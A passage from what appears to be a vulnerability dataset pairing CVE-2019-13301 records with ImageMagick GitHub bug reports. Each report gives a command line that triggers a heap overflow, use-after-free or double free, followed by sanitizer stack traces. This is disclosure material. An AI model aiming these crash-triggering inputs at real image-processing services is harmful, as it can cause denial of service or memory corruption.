__kmpc_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x2a7be) #6 0x61c9ca in EvaluateImages MagickCore/statistic.c:615:15 #7 0x13fcdb9 in CLIListOperatorImages MagickWand/operation.c:4081:22 #8 0x1406ec5 in CLIOption MagickWand/operation.c:5276:14 #9 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x531745 in MagickMain utilities/magick.c:149:10 #13 0x531091 in main utilities/magick.c:180:10 #14 0x7f7983059b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x425819 in _start (install/bin/magick+0x425819) 0x629000018800 is located 0 bytes to the right of 17920-byte region [0x629000014200,0x629000018800) allocated by thread T0 here: #0 0x4efb47 in __interceptor_malloc (install/bin/magick+0x4efb47) #1 0x5824e7 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x58254f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x61cfee in AcquirePixelThreadSet MagickCore/statistic.c:175:33 #4 0x61ba43 in EvaluateImages MagickCore/statistic.c:493:19 #5 0x13fcdb9 in CLIListOperatorImages MagickWand/operation.c:4081:22 #6 0x1406ec5 in CLIOption MagickWand/operation.c:5276:14 #7 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #8 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5 #9 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #10 0x531745 in MagickMain utilities/magick.c:149:10 #11 0x531091 in main utilities/magick.c:180:10 #12 0x7f7983059b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/statistic.c:654:41 in .omp_outlined._debug__.10 ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10 - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in MagickCore/statistic.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1586/comments
3
2019-06-10T15:57:48Z
2019-07-08T01:49:56Z
https://github.com/ImageMagick/ImageMagick/issues/1586
454,242,285
1,586
490
CVE-2019-13301
2019-07-05T01:15:10.297
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/f595a1985233c399a05c0c37cc41de16a90dd025" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1585" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1589" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/f595a1985233c399a05c0c37cc41de16a90dd025" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1585" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1589" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1585
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description There is a heap buffer overflow/heap-use-after-free vulnerability in MagickCore/resize.c:2823:28 in .omp_outlined._debug__.72 with the same input. And also memory leaks in AcquireMagickMemory of MagickCore/memory.c:478:10 this still exists [#1558](https://github.com/ImageMagick/ImageMagick/issues/1558) It sometimes doesn't occur so needs to be executed for several times. I found that this bug was not reproduced but it is reproduced with certain arguments. [#1500](https://github.com/ImageMagick/ImageMagick/issues/1500) <!-- A description of the bug or feature --> ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: `magick "-black-point-compensation" "-weight" "63" "(" "magick:logo" "-normalize" "-resize" "892%-38-49" ")" "(" "magick:wizard" "-preview" "Spiff" "-solarize" "35%" "-cycle" "813" ")" "(" "magick:granite" "-preview" "Blur" "-draw" ""rotate" "205"" "-colors" "109" ")" "-crop" "333x497" "-print" "" ` This is about the heap-buffer-overflow. ``` ================================================================= ==19621==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc8b5310d28 at pc 0x000000f00dff bp 0x7ffc7c6a9a50 sp 0x7ffc7c6a9a48 READ of size 4 at 0x7fc8b5310d28 thread T0 #0 0xf00dfe in .omp_outlined._debug__.72 MagickCore/resize.c:2823:28 #1 0xf019b6 in .omp_outlined..73 MagickCore/resize.c:2706:3 #2 0x7fc8c2077452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #3 0x7fc8c20311b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) #4 0x7fc8c20322b5 in __kmp_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x372b5) #5 0x7fc8c20257be in __kmpc_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x2a7be) #6 0xef317f in VerticalFilter MagickCore/resize.c:2703:11 #7 0xef0442 in ResizeImage MagickCore/resize.c:2961:14 #8 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21 #9 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15 #10 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21 #11 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #12 0x1406e7c in CLIOption MagickWand/operation.c:5270:16 #13 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #14 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5 #15 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #16 0x531745 in MagickMain utilities/magick.c:149:10 #17 0x531091 in main utilities/magick.c:180:10 #18 0x7fc8c1a13b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #19 0x425819 in _start (/usr/local/bin/magick+0x425819) 0x7fc8b5310d28 is located 1832 bytes to the right of 1175040-byte region [0x7fc8b51f1800,0x7fc8b5310600) allocated by thread T0 here: #0 0x4f09b0 in __interceptor_posix_memalign (/usr/local/bin/magick+0x4f09b0) #1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0xb11bac in OpenPixelCache MagickCore/cache.c:3728:46 #3 0xb188c5 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0xb1f66b in SyncImagePixelCache MagickCore/cache.c:5494:28 #5 0x53f46e in SetImageStorageClass MagickCore/image.c:2627:10 #6 0xef2791 in VerticalFilter MagickCore/resize.c:2681:7 #7 0xef0442 in ResizeImage MagickCore/resize.c:2961:14 #8 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21 #9 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15 #10 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21 #11 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #12 0x1406e7c in CLIOption MagickWand/operation.c:5270:16 #13 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #14 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5 #15 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #16 0x531745 in MagickMain utilities/magick.c:149:10 #17 0x531091 in main utilities/magick.c:180:10 #18 0x7fc8c1a13b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/resize.c:2823:28 in .omp_outlined._debug__.72 ``` And this is about heap-use-after-free. ``` ================================================================= ==24235==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f2fd1712c88 at pc 0x000000f00dff bp 0x7ffef1b2acd0 sp 0x7ffef1b2acc8 READ of size 4 at 0x7f2fd1712c88 thread T0 #0 0xf00dfe in .omp_outlined._debug__.72 MagickCore/resize.c:2823:28 #1 0xf019b6 in .omp_outlined..73 MagickCore/resize.c:2706:3 #2 0x7f2fde527452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #3 0x7f2fde4e11b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) #4 0x7f2fde4e22b5 in __kmp_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x372b5) #5 0x7f2fde4d57be in __kmpc_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x2a7be) #6 0xef317f in VerticalFilter MagickCore/resize.c:2703:11 #7 0xef0442 in ResizeImage MagickCore/resize.c:2961:14 #8 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21 #9 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15 #10 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21 #11 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #12 0x1406e7c in CLIOption MagickWand/operation.c:5270:16 #13 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #14 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5 #15 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #16 0x531745 in MagickMain utilities/magick.c:149:10 #17 0x531091 in main utilities/magick.c:180:10 #18 0x7f2fddec3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #19 0x425819 in _start (/usr/local/bin/magick+0x425819) 0x7f2fd1712c88 is located 1160 bytes inside of 1566720-byte region [0x7f2fd1712800,0x7f2fd1891000) freed by thread T0 here: #0 0x4ef768 in __interceptor_free (/usr/local/bin/magick+0x4ef768) #1 0x583e5c in RelinquishAlignedMemory MagickCore/memory.c:1037:3 #2 0xafde01 in RelinquishPixelCachePixels MagickCore/cache.c:972:40 #3 0xb12119 in OpenPixelCache MagickCore/cache.c:3757:19 #4 0xb188c5 in GetImagePixelCache MagickCore/cache.c:1754:18 #5 0xb1f66b in SyncImagePixelCache MagickCore/cache.c:5494:28 #6 0x53f46e in SetImageStorageClass MagickCore/image.c:2627:10 #7 0xef2791 in VerticalFilter MagickCore/resize.c:2681:7 #8 0xef0442 in ResizeImage MagickCore/resize.c:2961:14 #9 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21 #10 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15 #11 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21 #12 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #13 0x1406e7c in CLIOption MagickWand/operation.c:5270:16 #14 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #15 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5 #16 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #17 0x531745 in MagickMain utilities/magick.c:149:10 #18 0x531091 in main utilities/magick.c:180:10 #19 0x7f2fddec3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) previously allocated by thread T0 here: #0 0x4f09b0 in __interceptor_posix_memalign (/usr/local/bin/magick+0x4f09b0) #1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0xb11bac in OpenPixelCache MagickCore/cache.c:3728:46 #3 0xb188c5 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0xb1f66b in SyncImagePixelCache MagickCore/cache.c:5494:28 #5 0x54833f in SetImageExtent MagickCore/image.c:2668:10 #6 0x53f1c3 in CloneImage MagickCore/image.c:911:7 #7 0xef0272 in ResizeImage MagickCore/resize.c:2940:18 #8 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21 #9 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15 #10 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21 #11 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #12 0x1406e7c in CLIOption MagickWand/operation.c:5270:16 #13 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #14 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5 #15 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #16 0x531745 in MagickMain utilities/magick.c:149:10 #17 0x531091 in main utilities/magick.c:180:10 #18 0x7f2fddec3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/resize.c:2823:28 in .omp_outlined._debug__.72 ``` About memory leaks in AcquireMagickMemory of MagickCore/memory.c:478:10 ``` ==7040==ERROR: LeakSanitizer: detected memory leaks Direct leak of 73928 byte(s) in 18 object(s) allocated from: #0 0x4e53b7 in __interceptor_malloc (install/bin/magick+0x4e53b7) #1 0x7f26dee6f8b6 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f26dee6f91f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f26df03be77 in AcquireString MagickCore/string.c:142:24 #4 0x7f26df03ca21 in CloneString MagickCore/string.c:300:20 #5 0x7f26dec7b28a in CloneDrawInfo MagickCore/draw.c:310:12 #6 0x7f26dea7108b in AnnotateImage MagickCore/annotate.c:267:12 #7 0x7f26dee7e6ba in MontageImageList MagickCore/montage.c:842:22 #8 0x7f26dee78821 in MontageImages MagickCore/montage.c:316:17 #9 0x7f26decf1ba4 in PreviewImage MagickCore/effect.c:2747:17 #10 0x7f26de4f3581 in CLISimpleOperatorImage MagickWand/operation.c:2964:21 #11 0x7f26de4e39b8 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #12 0x7f26de509045 in CLIOption MagickWand/operation.c:5270:16 #13 0x7f26de348749 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #14 0x7f26de3499ba in MagickImageCommand MagickWand/magick-cli.c:796:5 #15 0x7f26de3940d2 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #16 0x526fb5 in MagickMain utilities/magick.c:149:10 #17 0x526901 in main utilities/magick.c:180:10 #18 0x7f26d8925b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: 73928 byte(s) leaked in 18 allocation(s). ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10 - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 (heap-buffer-overflow/heap-use-after-free are triggered when compiled with option '--disable-shared') (memory leak is triggered when compiled without option '--disable-shared') <!-- Thanks for reporting the issue to ImageMagick! -->
memory leaks in AcquireMagickMemory of MagickCore/memory.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1585/comments
5
2019-06-10T14:34:22Z
2019-10-05T02:53:40Z
https://github.com/ImageMagick/ImageMagick/issues/1585
454,202,041
1,585
491
CVE-2019-13301
2019-07-05T01:15:10.297
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/f595a1985233c399a05c0c37cc41de16a90dd025" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1585" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1589" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/f595a1985233c399a05c0c37cc41de16a90dd025" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1585" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1589" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1589
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There are a heap-use-after-free(sometimes heap-buffer-overflow) vulnerability in MagickCore/resize.c:2604:28 in .omp_outlined._debug__.69 and a double-free bug in RelinquishAlignedMemory MagickCore/memory.c:1037:3 with the same input. For each run, different bugs are triggered so please run the command for several times. related: [#1344](https://github.com/ImageMagick/ImageMagick/issues/1344) ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: `magick -seed 0 -black-point-compensation -units Undefined "(" magick:granite -opaque "rgb(224,28,104)" -gaussian-blur 2 -strip ")" "(" magick:rose -black-threshold 15 -preview Despeckle ")" -density 3x83 -stretch ExtraCondensed -copy "937x560ls" "-52-59" ""` This is about Heap-use-after-free in .omp_outlined._debug__.69 MagickCore/resize.c:2604:28 ``` ==26215==ERROR: AddressSanitizer: heap-use-after-free on address 0x62800000036c at pc 0x000000efe4dc bp 0x7f637b304e90 sp 0x7f637b304e88 READ of size 4 at 0x62800000036c thread T1 #0 0xefe4db in .omp_outlined._debug__.69 MagickCore/resize.c:2604:28 #1 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3 #2 0x7f6383e13452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #3 0x7f6383dcd1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) #4 0x7f6383dcbb20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20) #5 0x7f6383e0b417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417) #6 0x7f63864476da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da) #7 0x7f63838af88e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e) 0x62800000036c is located 620 bytes inside of 14400-byte region [0x628000000100,0x628000003940) freed by thread T2 here: #0 0x4ef768 in __interceptor_free (install/bin/magick+0x4ef768) #1 0x583e5c in RelinquishAlignedMemory MagickCore/memory.c:1037:3 #2 0xafe7c6 in RelinquishCacheNexusPixels MagickCore/cache.c:1089:12 #3 0xb0d5db in SetPixelCacheNexusPixels MagickCore/cache.c:5080:9 #4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7 #7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3 #8 0x7f6383e13452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #9 0x7f6383dcd1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) previously allocated by thread T1 here: #0 0x4f09b0 in 